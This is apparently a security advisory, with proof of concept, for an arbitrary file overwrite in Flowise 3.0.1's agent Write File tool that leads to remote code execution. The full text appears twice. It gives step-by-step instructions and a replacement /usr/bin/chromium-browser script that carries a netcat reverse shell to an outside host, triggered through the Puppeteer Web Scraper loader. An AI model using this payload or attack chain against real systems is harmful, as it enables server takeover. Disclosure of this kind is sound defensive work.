Summary
An authenticated attacker can use the agent writeFile tool to override existing files on the filesystem, leading to Remote Code Execution (RCE).
Details
A critical vulnerability exists in the on-premise deployment of Flowise 3.0.1 involving the writeFile functionality. Attackers can exploit this to overwrite or modify any file on the filesystem. By injecting malicious code into the chromium-browser script available at /usr/bin/chromium-browser, which is utilized by the "Puppeteer Web Scraper" Document loader.
PoC
To reproduce the vulnerability, you need to create a new agent.
Inside the agent add a “Write File” tool
Targeting the /usr/bin/chromium-browser file to override
file_path: /usr/bin/chromium-browser
text:
"<p>#!/bin/sh</p><p>for f in /etc/chromium/*.conf; do [ -f \"$f\" ] && . \"$f\"; done; CHROMIUM_FLAGS=\"$CHROMIUM_FLAGS ${CHROMIUM_USER_FLAGS:+\"$CHROMIUM_USER_FLAGS\"}\"; export CHROME_WRAPPER=\"$(readlink -f \"$0\")\"; PROGDIR=${CHROME_WRAPPER%/*}; case \":$PATH:\" in <em>:$PROGDIR:</em>) ;; *) export PATH=\"$PATH:$PROGDIR\" ;; esac; [ $(id -u) -eq 0 ] && [ $(stat -c %u -L ${XDG_CONFIG_HOME:-${HOME}}) -eq 0 ] && CHROMIUM_FLAGS=\"--user-data-dir=${XDG_CONFIG_HOME:-\"$HOME\"/.config}/chromium $CHROMIUM_FLAGS\"; export CHROME_DESKTOP=\"chromium.desktop\" CHROME_VERSION_EXTRA=\"Alpine Linux\"; nc revshell.evasecresearch.com 1337 -e /bin/sh > /dev/null; exec \"$PROGDIR/chromium\" ${CHROMIUM_FLAGS} \"$@\"</p>
Starting the flow will write the new content to the file on the filesystem.
Success
New file content contains reverse shell
To trigger the /usr/bin/chromium-browser execution and loading the reverse shell (code execution) you need to add a new “Document Store”
Inside it you need to add a new “Document Loader” and choose the “Puppeteer Web Scraper”
Fill any URL in the form and select “Preview Chunks”, will trigger the execution of /usr/bin/chromium-browser bash file.
Popping a reverse shell leading to a remote code execution
Dockerfile for reference
Impact
This is a critical Remote Code Execution (RCE) vulnerability. It allows an authenticated (or potentially unauthenticated when combined with a separate bypass) attacker to execute arbitrary code on the affected system. Specifically, it leverages the ability to write arbitrary files to override critical system components, like /usr/bin/chromium-browser, and insert malicious code.
Users of the on-premise deployment of Flowise 3.0.1 (latest) are impacted. This vulnerability affects systems running this specific version and deployment model. Organizations or individuals using Flowise 3.0.1 on their own servers are at risk.
Summary
An authenticated attacker can use the agent writeFile tool to override existing files on the filesystem, leading to Remote Code Execution (RCE).
Details
A critical vulnerability exists in the on-premise deployment of Flowise 3.0.1 involving the writeFile functionality. Attackers can exploit this to overwrite or modify any file on the filesystem. By injecting malicious code into the chromium-browser script available at /usr/bin/chromium-browser, which is utilized by the "Puppeteer Web Scraper" Document loader.
PoC
To reproduce the vulnerability, you need to create a new agent.
Inside the agent add a “Write File” tool
Targeting the /usr/bin/chromium-browser file to override
file_path: /usr/bin/chromium-browser
text:
"<p>#!/bin/sh</p><p>for f in /etc/chromium/*.conf; do [ -f \"$f\" ] && . \"$f\"; done; CHROMIUM_FLAGS=\"$CHROMIUM_FLAGS ${CHROMIUM_USER_FLAGS:+\"$CHROMIUM_USER_FLAGS\"}\"; export CHROME_WRAPPER=\"$(readlink -f \"$0\")\"; PROGDIR=${CHROME_WRAPPER%/*}; case \":$PATH:\" in <em>:$PROGDIR:</em>) ;; *) export PATH=\"$PATH:$PROGDIR\" ;; esac; [ $(id -u) -eq 0 ] && [ $(stat -c %u -L ${XDG_CONFIG_HOME:-${HOME}}) -eq 0 ] && CHROMIUM_FLAGS=\"--user-data-dir=${XDG_CONFIG_HOME:-\"$HOME\"/.config}/chromium $CHROMIUM_FLAGS\"; export CHROME_DESKTOP=\"chromium.desktop\" CHROME_VERSION_EXTRA=\"Alpine Linux\"; nc revshell.evasecresearch.com 1337 -e /bin/sh > /dev/null; exec \"$PROGDIR/chromium\" ${CHROMIUM_FLAGS} \"$@\"</p>Starting the flow will write the new content to the file on the filesystem.
Success
New file content contains reverse shell
To trigger the /usr/bin/chromium-browser execution and loading the reverse shell (code execution) you need to add a new “Document Store”
Inside it you need to add a new “Document Loader” and choose the “Puppeteer Web Scraper”
Fill any URL in the form and select “Preview Chunks”, will trigger the execution of /usr/bin/chromium-browser bash file.
Popping a reverse shell leading to a remote code execution
Dockerfile for reference
Impact
This is a critical Remote Code Execution (RCE) vulnerability. It allows an authenticated (or potentially unauthenticated when combined with a separate bypass) attacker to execute arbitrary code on the affected system. Specifically, it leverages the ability to write arbitrary files to override critical system components, like
/usr/bin/chromium-browser, and insert malicious code.Users of the on-premise deployment of Flowise 3.0.1 (latest) are impacted. This vulnerability affects systems running this specific version and deployment model. Organizations or individuals using Flowise 3.0.1 on their own servers are at risk.